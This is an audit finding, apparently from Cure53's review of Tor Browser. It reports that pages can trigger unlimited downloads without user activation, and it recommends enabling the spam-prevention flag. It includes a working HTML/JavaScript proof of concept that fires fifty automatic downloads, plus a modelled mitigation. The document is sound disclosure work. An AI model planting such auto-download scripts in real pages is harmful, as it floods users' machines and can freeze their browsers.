
TTP-02-004 OOS: No user-activation required to download files (Low)

Description

When investigating the new security warnings related to the downloaded files, Cure53 observed that there were no safeguards in place to restrict the number of files that could be downloaded by a single webpage.

This issue stems from the browser.download.enable_spam_prevention flag being set to false. As a result, malicious pages can download an unlimited number of arbitrary files to the user's Downloads folder without any user interaction. This also opens the door to DoS attacks on the user's browser, by having the page trigger downloads continuously.

PoC:

<html>
  <body>
    <script>
      onload = () => {
        let counter = 0;
        // Fire click() on the hidden download link every millisecond,
        // fifty times in total, with no user interaction involved.
        let timer = setInterval(() => {
          if (counter == 50) {
            clearInterval(timer);
            return;
          }
          download.click();
          counter++;
        }, 1);
      }
    </script>
    <!-- Anchor with the download attribute; clicked programmatically above -->
    <a id="download" href="data:text/html,1337" download="poc.html"></a>
  </body>
</html>

Steps to reproduce:

  1. Open Tor Browser and connect to the Tor network.
  2. Save the PoC above as an HTML file and open it in Tor Browser.
  3. Observe that fifty downloads will start automatically and be dropped in the default Downloads folder.

To mitigate this issue, Cure53 advises changing the value of the browser.download.enable_spam_prevention flag to true. The change will prevent malicious pages from automatically downloading multiple files. Instead, the user will have to actively grant the webpage permission if they wish to allow multiple downloads.
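The following is an added illustration, not Cure53's PoC nor Tor Browser's or Firefox's actual implementation, of what the mitigation enforces: a download gate that lets the first automatic download through but holds back further ones until the page acts within a user gesture. The 5 s window, the class name and the activation flag are assumptions made for the example; the PoC's timer loop is replayed against the gate with the flag on and off.

```javascript
// Simplified model of a "download spam prevention" gate. Assumption: Firefox's
// real policy differs in detail; only the shape of the check is modelled here.
const ACTIVATION_WINDOW_MS = 5000; // assumed: how long one automatic download "uses up"

class DownloadGate {
  constructor(enabled = true) {
    this.enabled = enabled;            // models browser.download.enable_spam_prevention
    this.lastAutoDownload = -Infinity; // time of the last download without a gesture
    this.blocked = [];                 // downloads the page attempted but was denied
  }

  // `hasUserActivation` plays the role of navigator.userActivation.isActive:
  // true inside a click/keypress handler, false when called from a timer.
  request(name, hasUserActivation, now) {
    if (!this.enabled || hasUserActivation) {
      return { name, allowed: true };
    }
    // Without a gesture, only one automatic download per window is allowed;
    // further ones are held back until the user grants permission.
    if (now - this.lastAutoDownload < ACTIVATION_WINDOW_MS) {
      this.blocked.push(name);
      return { name, allowed: false, reason: "needs user activation" };
    }
    this.lastAutoDownload = now;
    return { name, allowed: true };
  }
}

// Replay of the PoC's timer loop: fifty click() calls 1 ms apart from onload,
// none of them inside a user gesture. Returns how many downloads got through.
function replayPoc(gate) {
  let allowed = 0;
  for (let i = 0; i < 50; i++) {
    if (gate.request(`poc-${i}.html`, false, i).allowed) allowed++;
  }
  return allowed;
}

console.log("flag on :", replayPoc(new DownloadGate(true)), "download(s) allowed");
console.log("flag off:", replayPoc(new DownloadGate(false)), "download(s) allowed");
```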

Edited by morgan